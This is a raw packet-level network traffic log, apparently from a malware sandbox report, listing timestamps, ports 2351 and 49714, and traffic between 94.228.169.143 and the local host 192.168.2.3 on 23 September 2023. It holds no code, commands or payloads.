Sep 23, 2023 08:02:06.756531000 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756567955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756604910 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756617069 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756642103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756688118 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756742001 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756840944 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756891966 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756970882 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757031918 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757071018 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757085085 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757277966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757318974 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757328033 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757355928 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757404089 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757424116 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757496119 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757546902 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757623911 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757714987 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757750988 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757771015 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757884026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757922888 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.757930040 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.757961035 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758004904 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758029938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758137941 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758188963 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758234024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758305073 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758342981 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758352995 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758380890 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758425951 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758450031 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758554935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758606911 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758651018 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758758068 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758809090 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.758883953 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.758981943 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759028912 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759042025 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759078026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759114027 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759131908 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759217024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759255886 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759268045 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759324074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759360075 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759368896 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759397030 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759439945 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759485960 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759521961 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759557962 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759563923 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759596109 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759639978 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759661913 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759761095 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759808064 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759851933 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759921074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.759963989 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.759993076 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760174990 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760231018 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.760272026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760340929 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760384083 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.760411024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760448933 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760504961 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.760543108 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760580063 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760617971 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760626078 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.760754108 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.760802984 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.767622948 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.801588058 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.801651955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.801712990 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.076920033 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.076986074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077023983 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077060938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077095985 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077100992 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077140093 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077142000 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077181101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077202082 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077218056 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077259064 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077295065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077301979 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077332020 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077353001 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077368975 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077406883 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077425003 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077529907 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077588081 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077635050 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077703953 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077759981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077800989 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077836990 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.077886105 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.077935934 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078028917 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078075886 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078552961 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078591108 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078629017 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078641891 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078666925 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078704119 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078713894 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078746080 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078784943 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078799963 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078821898 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078859091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078876019 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078875065 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078895092 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078912973 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078922033 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078960896 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078967094 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.078979015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.078996897 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079025030 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079088926 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079103947 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079114914 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079125881 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079135895 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079138994 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079169989 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079219103 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079327106 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079372883 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079385042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079396963 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079415083 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079444885 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079705000 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079719067 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079730034 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079762936 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.079812050 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.079859018 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.080039024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080108881 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080121040 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080132008 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080163002 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.080193043 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080208063 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.080239058 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080287933 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.080349922 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080363035 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.080409050 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088525057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088602066 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088613987 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088624954 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088638067 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088644981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088649988 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088663101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088673115 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088715076 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088733912 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088749886 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088761091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088773966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088782072 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088785887 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088798046 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088819981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088831902 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088845015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088861942 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088862896 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088898897 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088913918 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088936090 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088972092 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088985920 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.088988066 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.088988066 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.089030027 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.122814894 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.122952938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.122991085 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.123030901 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.123150110 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.123150110 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.398808002 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.398870945 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.398909092 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.398948908 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.398956060 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.398992062 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399010897 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399030924 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399066925 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399081945 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399106026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399143934 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399161100 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399179935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399218082 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399230957 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399259090 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399293900 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399306059 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399332047 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399368048 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399382114 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399494886 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399533033 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399545908 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399570942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399610043 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399622917 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399647951 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399683952 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399699926 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399787903 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399837971 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.399857044 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399925947 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.399976969 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400057077 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400155067 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400193930 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400212049 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400237083 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400295973 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400312901 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400382042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400432110 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400470018 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400533915 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400572062 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400583029 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400613070 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400649071 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400664091 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400686026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400733948 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400788069 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400887012 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.400937080 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.400975943 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401048899 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401099920 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401189089 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401226997 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401276112 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401313066 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401350021 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401398897 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401421070 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401489019 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401526928 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401537895 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401562929 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401598930 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401607990 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401667118 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401721001 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401760101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401870012 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401917934 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.401925087 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.401990891 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402041912 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402077913 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402113914 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402153015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402165890 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402189970 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402244091 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402261972 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402297974 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402347088 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402364969 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402435064 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402483940 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402502060 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402539015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402590036 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402635098 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402672052 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402709007 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402719021 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402776957 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402826071 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.402843952 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402934074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402970076 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.402983904 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403008938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403059959 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403131962 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403167963 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403219938 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403228045 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403268099 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403315067 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403336048 CEST	2351	49714	94.228.169.143	192.168.2.3
